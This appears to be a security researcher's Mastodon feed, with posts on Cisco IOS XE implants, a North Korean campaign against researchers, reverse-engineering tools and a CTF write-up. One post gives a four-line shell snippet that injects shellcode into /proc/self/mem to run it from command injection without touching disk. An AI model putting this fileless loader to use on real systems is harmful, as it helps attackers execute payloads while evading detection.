fidgetingbits

216 Followers
306 Following
84 Posts

Exploit developer at NCC group. Working in the Exploit Development Group with @saidelike and @alexplaskett

Competing in some pwn2own events since 2021.

100% voice coding for the last few years using Talon.

As many as 30,000 internet-facing Cisco routers and switches running IOS XE have been infected with implants after exploitation of CVE-2023-20198: https://vulncheck.com/blog/cisco-implants #infosec

Cisco's Talos has a blog here: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/

Widespread Cisco IOS XE Implants in the Wild - Blog - VulnCheck

VulnCheck scanned the internet for implanted Cisco IOS XE systems and found thousands of results.

Just re-read this.

Regulators of implanted medical technology should be demanding that all source code, design docs and other technical material be lodged in escrow.

If the company ceases to make support available, make it all public.

It's one thing for movies or TV shows or video games to disappear "into the vault", but prioritising protection of completely unused IP rights over the health and wellbeing of patients is criminal.

https://spectrum.ieee.org/bionic-eye-obsolete

Their Bionic Eyes Are Now Obsolete and Unsupported

These early adopters found out what happened when a cutting-edge marvel became an obsolete gadget... inside their bodies.

New Rust string recovery @binaryninja plugin from me: Rust String Slicer (https://github.com/cxiao/rust_string_slicer). It finds the addresses and lengths of strings in Rust binaries, then sets the types of the strings so that they show as the correct lengths.

It uses very similar heuristics as the IDA Pro Rust Analysis Plugin from Hex-Rays, which I previously wrote about here: https://infosec.exchange/@cxiao/110637216992474832

Give it a try, let me know if it's useful, and file an issue if it breaks for your binary (I know there are definitely binaries for which it breaks haha).  

Thank you to several people in the OALabs discord for watching me hack on this and giving useful tips during the development!

#rust #rustlang #reverseengineering #malwareanalysis #reversing #binaryninja

GitHub - cxiao/rust_string_slicer: A Binary Ninja plugin to help find the addresses and lengths of strings in Rust binaries.

The dots don't move. It's the camera that moves and zooms in or out (a grid is seen from infinity), but with different time offset for each dot.

Today was ... interesting. If you followed me for the past months over on the shitbird site, you might have seen a bunch of angry German words, lots of graphs, and the occasional newspaper, radio, or TV snippet with yours truly. Let me explain.

In Austria, inflation is way above the EU average. There's no end in sight. This is especially true for basic needs like energy and food.

Our government stated in May that they'd build a food price database together with the big grocery chains. But..

NK targeting researchers was the reason I initially left Twitter. Seems like they're starting to have a mastodon presence as well (https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/, thanks @codecolorist for pointing out the mastodon IOC) :( there's no escape from these fucks
Active North Korean campaign targeting security researchers

Threat Analysis Group shares findings on a new campaign by North Korean actors targeting security researchers.

BioDiff: Compare binary files using alignment algorithms.

It looks interesting - note the skipped gaps in the compared displays!
https://github.com/8051Enthusiast/biodiff

GitHub - 8051Enthusiast/biodiff: Hex diff viewer using alignment algorithms from biology

Q: What do you call an AVX2 instruction that can be exploited in a side-channel attack to leak information?

A: An attack vector.

After a morning of code golf, here are 4 lines of portable shell script to run your shellcode on Linux from command injection without touching disk:

PAYLOAD='\100\000\200<shellcode...>\000\000\000\000'
exec 5>/proc/self/mem
read -r _ _ _ _ _ _ _ _ ADDR </proc/self/syscall
( dd count=0 bs=1 skip=$((ADDR)) <&5; printf "${PAYLOAD}" >&5 )

This is maybe the coolest thing I've seen in my life.

T3mp3st not only did a writeup of the CTF I helped build (which feels very cool to say) but also managed to get the original PCAP files Mike Lindell used in his cybersecurity summit.

Legit losing my mind at how cool this is. I couldn't talk about the pcaps until after the ctf was over but the second I got an email asking to do a USB drive handoff I started hooting and hollering like a howler monkey.

https://medium.com/@t3mp3st.19/noisefest-ctf-2023-7f4ba113fd11